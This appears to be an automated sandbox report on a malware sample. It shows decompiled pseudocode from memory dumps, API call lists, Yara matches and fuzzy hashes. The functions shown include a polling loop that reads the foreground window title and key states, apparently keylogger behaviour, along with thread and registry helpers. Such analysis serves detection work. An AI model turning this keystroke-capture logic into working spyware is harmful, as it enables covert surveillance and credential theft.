                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000010), ref: 240503F9
                                    • GetTickCount.KERNEL32 ref: 240524A2
                                    • GetTickCount.KERNEL32 ref: 240524EE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: StateWindow$CountTextTick$AsyncForegroundLengthSleep
                                    • String ID:
                                    • API String ID: 3649555911-0
                                    • Opcode ID: 91c7310ca5d38c37ac4828fdf369e8172a3eef7ef3f4a4e96e0c25cd4990e72e
                                    • Instruction ID: 88ac6a5228864df4ce82301c609121cc8bfecb590a9422676e9ef9625203f763
                                    • Opcode Fuzzy Hash: 91c7310ca5d38c37ac4828fdf369e8172a3eef7ef3f4a4e96e0c25cd4990e72e
                                    • Instruction Fuzzy Hash: 4001D830204140EFF706DB95C890E5E7BD8FF99768F208469E4459F12ACAB19EC58EE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E24052460() {
                                    				char _v8;
                                    				intOrPtr _v36;
                                    				signed char _t5;
                                    				long _t12;
                                    				void* _t13;
                                    				long _t22;
                                    				void* _t23;
                                    				intOrPtr* _t36;
                                    				void* _t40;
                                    
                                    				 *_t5 =  *_t5 & _t5;
                                    				 *_t5 =  *_t5 + _t5;
                                    				_push(0);
                                    				_push(_t22);
                                    				_push(_t36);
                                    				_push(0x2405250d);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t36;
                                    				while(1) {
                                    					Sleep(1); // executed
                                    					E2401794C( &_v8, _t22, _t23, 0x24063304, 0x2406330c); // executed
                                    					E240130DC(0x2406330c, _v8);
                                    					E2405038C(_t22, 0x24063304, 0x2406330c);
                                    					_t12 = GetTickCount();
                                    					_push(0);
                                    					_push(_t12);
                                    					_t3 = _t22 + 0x12c; // 0x12c
                                    					_t13 = _t3;
                                    					asm("cdq");
                                    					if(0 != _v36) {
                                    						goto L5;
                                    					}
                                    					L3:
                                    					_t40 = _t13 -  *_t36;
                                    					if(_t40 >= 0) {
                                    						continue;
                                    						do {
                                    							while(1) {
                                    								Sleep(1); // executed
                                    								E2401794C( &_v8, _t22, _t23, 0x24063304, 0x2406330c); // executed
                                    								E240130DC(0x2406330c, _v8);
                                    								E2405038C(_t22, 0x24063304, 0x2406330c);
                                    								_t12 = GetTickCount();
                                    								_push(0);
                                    								_push(_t12);
                                    								_t3 = _t22 + 0x12c; // 0x12c
                                    								_t13 = _t3;
                                    								asm("cdq");
                                    								if(0 != _v36) {
                                    									goto L5;
                                    								}
                                    								goto L3;
                                    							}
                                    							goto L5;
                                    							L6:
                                    							E24013480( *0x24063304,  *0x2406330c);
                                    						} while (_t40 == 0);
                                    						_t41 =  *0x24063308 - 1;
                                    						if( *0x24063308 == 1) {
                                    							E24052240(_t22, 0x24063304, 0x2406330c, _t41);
                                    							 *0x24063308 = 0;
                                    						}
                                    						E240130DC(0x24063304,  *0x2406330c);
                                    						_t22 = GetTickCount();
                                    						continue;
                                    					}
                                    					goto L6;
                                    					L5:
                                    					if(__eflags >= 0) {
                                    						continue;
                                    					}
                                    					goto L6;
                                    				}
                                    			}

                                    APIs
                                    • Sleep.KERNEL32(00000001,00000000,2405250D,?,?,?,?,00000000), ref: 24052486
                                      • Part of subcall function 2401794C: GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                      • Part of subcall function 2401794C: GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                      • Part of subcall function 2401794C: GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                      • Part of subcall function 2405038C: GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000014), ref: 240503EC
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000010), ref: 240503F9
                                    • GetTickCount.KERNEL32 ref: 240524A2
                                    • GetTickCount.KERNEL32 ref: 240524EE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: StateWindow$CountTextTick$AsyncForegroundLengthSleep
                                    • String ID:
                                    • API String ID: 3649555911-0
                                    • Opcode ID: 56e882d13cfdc5414056da230572404680f467836f3930c0d3be041606eaf96f
                                    • Instruction ID: d1162dd9223b267aebf286926134ab69d4ac6f0e86b7daeeebff8111f733a11d
                                    • Opcode Fuzzy Hash: 56e882d13cfdc5414056da230572404680f467836f3930c0d3be041606eaf96f
                                    • Instruction Fuzzy Hash: 9101B930204150EFF702DBA5C890A5E7BD8FF99754F2044A9E4455F129CAB19EC58EE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E2401794C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				struct HWND__* _t9;
                                    				struct HWND__* _t22;
                                    				intOrPtr _t26;
                                    				void* _t30;
                                    				int _t33;
                                    				intOrPtr _t36;
                                    
                                    				_push(0);
                                    				_t30 = __eax;
                                    				_push(_t36);
                                    				_push(0x240179b9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t36;
                                    				E24013088(__eax); // executed
                                    				_t9 = GetForegroundWindow(); // executed
                                    				_t22 = _t9;
                                    				if(_t22 != 0) {
                                    					_t33 = GetWindowTextLengthA(_t22) + 1;
                                    					E240136BC( &_v8, _t33);
                                    					GetWindowTextA(_t22, E24013534(_v8), _t33);
                                    					E2401790C(_v8, _t30);
                                    				}
                                    				_pop(_t26);
                                    				 *[fs:eax] = _t26;
                                    				_push(E240179C0);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                    • GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                    • GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Text$ForegroundLength
                                    • String ID:
                                    • API String ID: 1471897267-0
                                    • Opcode ID: 6ef0ae46ab523d1d319b6f741911aa39b2de34215fb8f510f160de2ee3379a1a
                                    • Instruction ID: 1f6c2f9f1c5c4e4ccece54c0928ec55157105647c4883a3bd8a068302e791fcf
                                    • Opcode Fuzzy Hash: 6ef0ae46ab523d1d319b6f741911aa39b2de34215fb8f510f160de2ee3379a1a
                                    • Instruction Fuzzy Hash: B0F096716106447BFB02A675DC91D5EB7DDDB96554B910071F808E3208DAB4AF448564
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNELBASE(?), ref: 05090018
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05090023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621887139.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                    Similarity
                                    • API ID: ExitHandleModuleThreadUser
                                    • String ID:
                                    • API String ID: 3752825402-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E240178C4(_Unknown_base(*)()* __eax, long __ecx, int __edx) {
                                    				void* _t4;
                                    				void* _t7;
                                    				void* _t8;
                                    				int _t13;
                                    				DWORD* _t15;
                                    
                                    				 *__eax = __eax +  *__eax;
                                    				 *((intOrPtr*)(_t7 + 0x56)) =  *((intOrPtr*)(_t7 + 0x56)) + __edx;
                                    				_push(_t7);
                                    				_push(__ecx);
                                    				_t13 = __edx;
                                    				_t4 = CreateThread(0, 0, __eax, 0, __ecx, _t15); // executed
                                    				_t8 = _t4;
                                    				SetThreadPriority(_t8, _t13); // executed
                                    				return _t8;
                                    			}

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                    • SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$CreatePriority
                                    • String ID:
                                    • API String ID: 2610526550-0
                                    • Opcode ID: 61bb2c7c535dddc69725e08d5f89bd8f97d57c9ece6b52f4b021e6be42d572b0
                                    • Instruction ID: f067ca7646760172a42d2ce95e04ed8e178e153a7ea5017d4231b86e866a64a5
                                    • Opcode Fuzzy Hash: 61bb2c7c535dddc69725e08d5f89bd8f97d57c9ece6b52f4b021e6be42d572b0
                                    • Instruction Fuzzy Hash: D7D0C9A138E3903FF71552A52C82FBB1A0CCB82669F2402AABA1C9E1C6C0846C0852B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E240178C8(_Unknown_base(*)()* __eax, long __ecx, int __edx) {
                                    				void* _t2;
                                    				void* _t5;
                                    				int _t9;
                                    				DWORD* _t10;
                                    
                                    				_push(__ecx);
                                    				_t9 = __edx;
                                    				_t2 = CreateThread(0, 0, __eax, 0, __ecx, _t10); // executed
                                    				_t5 = _t2;
                                    				SetThreadPriority(_t5, _t9); // executed
                                    				return _t5;
                                    			}
                                    Instruction addresses: 0x240178ca, 0x240178cb, 0x240178d6, 0x240178db, 0x240178df, 0x240178e9

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                    • SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$CreatePriority
                                    • String ID:
                                    • API String ID: 2610526550-0
                                    • Opcode ID: b90d59c1ece38c85e66cc4d89c17127a835bff16823114e983e9d7694cf179ae
                                    • Instruction ID: aef8762a0d873128f918a3c20f786550bfc9aa2afeb29080f16a316379f761c2
                                    • Opcode Fuzzy Hash: b90d59c1ece38c85e66cc4d89c17127a835bff16823114e983e9d7694cf179ae
                                    • Instruction Fuzzy Hash: CBD04CF235A2203EF62412A67C86FBB494CCBD57BDF205279B61C9E2C5D4816C4451F5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 04EB001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04EB0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620799125.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: cced881d7e076ddb83b870002673f0bf113c93167b8887f10267e9765c957dd3
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2FE00A74D04608EFCB04DF99C54889EBBB5AF49320B25C295E865973A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 051B001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 051B0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622217193.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 1e1a1fa6e66503b13a795122efded7bc6e90cb03228b4090ec6ab2fe1322312e
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 30E00A74D04608EFCB14DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 059A001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 059A0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623869692.00000000059A0000.00000040.00000001.sdmp, Offset: 059A0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: ce4926d0c121923cea884fb9f2792c35c91d2c92609bc78dd9bf87301a41fd36
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 59E09A74D00608EFCB04CF99C44888DBBB5AF48320B20C291E825973A5D7309E41DA80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 04FD001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04FD0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621639734.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 9166b1db9a78641e4b14d42254fe4d6abd78009e99f4b5b67f80966e26dddc98
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2AE00A74D04608EFCB04DF99C54889DBBB5AF49320F25C295E865973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 050C001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 050C0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621934626.00000000050C0000.00000040.00000001.sdmp, Offset: 050C0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 00e0fe9d888f4cd2ed0eaf47a2850e1ad25a1186c38e5896d6d6211723e36375
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2FE00274D04608EFCB04DF99C98889DBBB5AF89320F25C295E865A73A5D730AE41DA80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 0539001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05390026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622755155.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: cb5c5214a2d8c7f3050c44908a5fefd86ddce890cbea8e22385e83c35f3c4df9
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 03E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE519A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E240178EC(void* __eax) {
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __eax;
                                    				TerminateThread(__eax, 1); // executed
                                    				asm("sbb ebx, ebx");
                                    				CloseHandle(_t7);
                                    				return _t5 + 1;
                                    			}
                                    Instruction addresses: 0x240178ee, 0x240178f3, 0x240178fb, 0x240178ff, 0x24017908

                                    APIs
                                    • TerminateThread.KERNEL32(00000000,00000001,?,2405B9C4,24038452,00000000,2403847A,?,?,240384EC,?,240384EC,?,?,?,240384EC), ref: 240178F3
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,?,2405B9C4,24038452,00000000,2403847A,?,?,240384EC,?,240384EC,?,?,?), ref: 240178FF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleTerminateThread
                                    • String ID:
                                    • API String ID: 2476175854-0
                                    • Opcode ID: 5893ba647653e121ef019f223bc399437da0a54cee20f113e6114f75509b07f9
                                    • Instruction ID: a520300e3a8eddb656dd34bb2fac21e4e9764e02fefaed21613025adbbddcd78
                                    • Opcode Fuzzy Hash: 5893ba647653e121ef019f223bc399437da0a54cee20f113e6114f75509b07f9
                                    • Instruction Fuzzy Hash: C7C09BA23536743DF611296C1CD0EFF414DDF525EEF100776F944D5154C5864D8901E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E24016A60(void* __eax, void* __ebx, void* __ecx) {
                                    				struct _SYSTEMTIME _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t33;
                                    				void* _t34;
                                    				intOrPtr _t41;
                                    				void* _t47;
                                    
                                    				_t34 = __ecx;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				_t33 = __eax;
                                    				_push(_t47);
                                    				_push(0x24016aee);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t47 + 0xffffffe8;
                                    				GetLocalTime( &_v20);
                                    				E240158BC( &_v24, _t34, 0, _v20.wSecond & 0x0000ffff, 0);
                                    				if(E2401333C(_v24) != 1) {
                                    					E240158BC(_t33, _t34, 0, _v20.wSecond & 0x0000ffff, 0); // executed
                                    				} else {
                                    					E240158BC( &_v28, _t34, 0, _v20.wSecond & 0x0000ffff, 0);
                                    					E24013388(_t33, _v28, 0x24016b04);
                                    				}
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				_push(E24016AF5);
                                    				return E240130AC( &_v28, 2);
                                    			}
                                    Instruction addresses: 0x24016a60, 0x24016a69, 0x24016a6c, 0x24016a6f, 0x24016a73, 0x24016a74, 0x24016a79, 0x24016a7c, 0x24016a83, 0x24016a93, 0x24016aa1, 0x24016ace, 0x24016aa3, 0x24016aae, 0x24016abd, 0x24016abd, 0x24016ad5, 0x24016ad8, 0x24016adb, 0x24016aed

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,24016AEE,?,00000000), ref: 24016A83
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: bdaa2702332f1484a244b9dd0b22e1194163d2d43d4aec312b96146b36966224
                                    • Instruction ID: 02c9b6e5572f9378d7c37504dd889ffac2077f20a8fad1a42327021ce7723570
                                    • Opcode Fuzzy Hash: bdaa2702332f1484a244b9dd0b22e1194163d2d43d4aec312b96146b36966224
                                    • Instruction Fuzzy Hash: F1019670A041099FFB01DBA5CC519BFB6FDEFD8704B91C436B408E6254E9349E80C561
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E24016A5F(void* __eax, void* __ebx, void* __ecx, void* __edx) {
                                    				struct _SYSTEMTIME _v20;
                                    				char _v24;
                                    				char _v28;
                                    				intOrPtr _v117;
                                    				void* _t35;
                                    				void* _t36;
                                    				intOrPtr _t44;
                                    				void* _t50;
                                    
                                    				_t36 = __ecx;
                                    				_v117 = _v117 + __edx;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				_t35 = __eax;
                                    				_push(_t50);
                                    				_push(0x24016aee);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t50 + 0xffffffe8;
                                    				GetLocalTime( &_v20);
                                    				E240158BC( &_v24, _t36, 0, _v20.wSecond & 0x0000ffff, 0);
                                    				if(E2401333C(_v24) != 1) {
                                    					E240158BC(_t35, _t36, 0, _v20.wSecond & 0x0000ffff, 0); // executed
                                    				} else {
                                    					E240158BC( &_v28, _t36, 0, _v20.wSecond & 0x0000ffff, 0);
                                    					E24013388(_t35, _v28, 0x24016b04);
                                    				}
                                    				_pop(_t44);
                                    				 *[fs:eax] = _t44;
                                    				_push(E24016AF5);
                                    				return E240130AC( &_v28, 2);
                                    			}
                                    Instruction addresses: 0x24016a5f, 0x24016a5f, 0x24016a69, 0x24016a6c, 0x24016a6f, 0x24016a73, 0x24016a74, 0x24016a79, 0x24016a7c, 0x24016a83, 0x24016a93, 0x24016aa1, 0x24016ace, 0x24016aa3, 0x24016aae, 0x24016abd, 0x24016abd, 0x24016ad5, 0x24016ad8, 0x24016adb, 0x24016aed

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,24016AEE,?,00000000), ref: 24016A83
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: e9f94ed46a3f5b85e0d0e36e6017f28098cf83d900caa7defc6abb3735950f8c
                                    • Instruction ID: d4e045e2793ec74dbaa2a97c45d513b8a731b2cfb064601b63da47b5f495dcf0
                                    • Opcode Fuzzy Hash: e9f94ed46a3f5b85e0d0e36e6017f28098cf83d900caa7defc6abb3735950f8c
                                    • Instruction Fuzzy Hash: DD0184709041099FFB01CBE5CC51DBFB7FDEBD8704B91857AE408E2694D9349E91C961
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E24040DB8(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v84;
                                    				struct _SHFILEINFO _v356;
                                    				char _v360;
                                    				intOrPtr _t26;
                                    				void* _t33;
                                    
                                    				_v360 = 0;
                                    				_push(_t33);
                                    				_push(0x24040e3f);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t33 + 0xfffffe9c;
                                    				E24017038( &_v360);
                                    				SHGetFileInfo(E24013534(_v360), 0,  &_v356, 0x160, 0x400); // executed
                                    				asm("movsd");
                                    				asm("movsb");
                                    				E240122F4(0x2405cc15, 0x50,  &_v84);
                                    				_pop(_t26);
                                    				 *[fs:eax] = _t26;
                                    				_push(0x24040e46);
                                    				return E24013088( &_v360);
                                    			}
                                    Instruction addresses: 0x24040dc5, 0x24040dcd, 0x24040dce, 0x24040dd3, 0x24040dd6, 0x24040df2, 0x24040e03, 0x24040e12, 0x24040e13, 0x24040e21, 0x24040e28, 0x24040e2b, 0x24040e2e, 0x24040e3e

                                    APIs
                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00000400), ref: 24040E03
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileInfo
                                    • String ID:
                                    • API String ID: 4041567068-0
                                    • Opcode ID: 55daa1995822bb6e560317fde2095a6f6a8c8eb3ca28530af70aae0f3cb37aa5
                                    • Instruction ID: 4d12fe45ce0c4572286532c8ef752bfedee2dd097d97dcf5b61a740bb4d05cf4
                                    • Opcode Fuzzy Hash: 55daa1995822bb6e560317fde2095a6f6a8c8eb3ca28530af70aae0f3cb37aa5
                                    • Instruction Fuzzy Hash: F5F0AF309182086FE711DB22CC91FDB7ABCEB49754F8104B4E508E7198D6B2AE80CE60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2401456C(void* __eax) {
                                    				char _v272;
                                    				intOrPtr _t14;
                                    				void* _t16;
                                    				intOrPtr _t18;
                                    				intOrPtr _t19;
                                    
                                    				_t16 = __eax;
                                    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                    					_t3 = _t16 + 4; // 0x24010000
                                    					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                    					_t14 = E240147A8(_t19); // executed
                                    					_t18 = _t14;
                                    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                    					if(_t18 == 0) {
                                    						_t5 = _t16 + 4; // 0x24010000
                                    						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                    					}
                                    				}
                                    				_t7 = _t16 + 0x10; // 0x24010000
                                    				return  *_t7;
                                    			}
                                    Instruction addresses: 0x24014574, 0x2401457a, 0x24014586, 0x2401458a, 0x24014593, 0x24014598, 0x2401459a, 0x2401459f, 0x240145a1, 0x240145a4, 0x240145a4, 0x2401459f, 0x240145a7, 0x240145b2

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(24010000,?,00000105), ref: 2401458A
                                      • Part of subcall function 240147A8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 240147C4
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240147E2
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 24014800
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 2401481E
                                      • Part of subcall function 240147A8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 24014867
                                      • Part of subcall function 240147A8: RegQueryValueExA.ADVAPI32(?,24014A14,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001), ref: 24014885
                                      • Part of subcall function 240147A8: RegCloseKey.ADVAPI32(?,240148B4,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240148A7
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Open$FileModuleNameQueryValue$Close
                                    • String ID:
                                    • API String ID: 2796650324-0
                                    • Opcode ID: 1507f16d1c8060c37e29c217a3c29be13e96fd5195aa6ed9a79a539f112e1d2e
                                    • Instruction ID: 62c2dd8a1114009e231d768c8528c853446194cf75c085bddc670beb0fccaca3
                                    • Opcode Fuzzy Hash: 1507f16d1c8060c37e29c217a3c29be13e96fd5195aa6ed9a79a539f112e1d2e
                                    • Instruction Fuzzy Hash: C7E06D71A002108FDB00DE5CC8C0B4A33D8AB48654F040661EC59CF34BD370DA9087D0
                                    Uniqueness

